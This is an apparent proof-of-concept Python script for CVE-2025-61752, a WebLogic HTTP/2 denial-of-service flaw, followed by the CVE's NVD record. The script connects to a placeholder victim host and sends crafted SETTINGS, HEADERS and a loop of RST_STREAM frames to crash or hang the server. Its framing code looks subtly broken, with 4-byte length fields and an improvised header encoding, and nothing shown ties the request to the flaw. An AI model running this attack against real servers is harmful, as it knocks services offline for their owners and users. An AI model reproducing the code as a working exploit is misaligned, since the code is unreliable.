CVE-2025-61752

# CVE-2025-61752 Oracle WebLogic Server HTTP/2 DoS PoC # This is a conceptual PoC demonstrating the attack vector # The vulnerability can be triggered via HTTP/2 protocol import socket import ssl import struct def exploit_weblogic_http2_dos(target_host, target_port, use_tls=True): """ Conceptual PoC for CVE-2025-61752 Oracle WebLogic Server HTTP/2 Denial of Service """ # Create connection if use_tls: context = ssl.create_default_context() context.set_alpn_protocols(['h2']) sock = socket.create_connection((target_host, target_port)) sock = context.wrap_socket(sock, server_hostname=target_host) else: sock = socket.create_connection((target_host, target_port)) # HTTP/2 connection preface connection_preface = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n' sock.send(connection_preface) # Send HTTP/2 SETTINGS frame settings_frame = build_settings_frame() sock.send(settings_frame) # Send malicious HTTP/2 HEADERS frame with crafted request # that triggers the vulnerability in WebLogic Core component malicious_headers = build_malicious_request(target_host) sock.send(malicious_headers) # Send RST_STREAM or continue sending malformed frames # to cause server hang or crash for i in range(100): rst_frame = build_rst_stream_frame(i * 2 + 1, error_code=0x8) sock.send(rst_frame) sock.close() print(f"DoS attack sent to {target_host}:{target_port}") def build_settings_frame(): # HTTP/2 SETTINGS frame construction payload = struct.pack('!HH', 0x0003, 100) # MAX_CONCURRENT_STREAMS payload += struct.pack('!HH', 0x0004, 65535) # INITIAL_WINDOW_SIZE length = len(payload) frame = struct.pack('!I', length) + bytes([0x04]) + bytes([0x00]) + struct.pack('!I', 0) + payload return frame def build_malicious_request(host): # Build malicious HTTP/2 HEADERS frame # targeting WebLogic Server Core component vulnerability headers = [ (':method', 'POST'), (':path', '/'), (':scheme', 'https'), (':authority', host), ('content-type', 'application/json'), ] # Encode headers using HPACK encoded = hpack_encode(headers) length = len(encoded) frame = struct.pack('!I', length) + bytes([0x01]) + bytes([0x05]) + struct.pack('!I', 1) + encoded return frame def build_rst_stream_frame(stream_id, error_code): payload = struct.pack('!I', error_code) length = len(payload) frame = struct.pack('!I', length) + bytes([0x03]) + bytes([0x00]) + struct.pack('!I', stream_id) + payload return frame def hpack_encode(headers): # Simplified HPACK encoding result = b'\x00' for name, value in headers: result += bytes([0x00]) # Literal header field without indexing result += bytes([len(name)]) + name.encode() result += bytes([len(value)]) + value.encode() return result if __name__ == "__main__": # Target vulnerable WebLogic Server TARGET_HOST = "victim.example.com" TARGET_PORT = 7002 # WebLogic HTTPS port exploit_weblogic_http2_dos(TARGET_HOST, TARGET_PORT, use_tls=True)

{"cve": {"id": "CVE-2025-61752", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:51.587", "lastModified": "2025-10-24T14:36:08.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 14.1.1.0.0 and 14.1.2.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP/2 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "04BCDC24-4A21-473C-8733-0D9CFB38A752"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "0FCA3D99-4596-4CF0-B5E1-7A6497F83B83"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}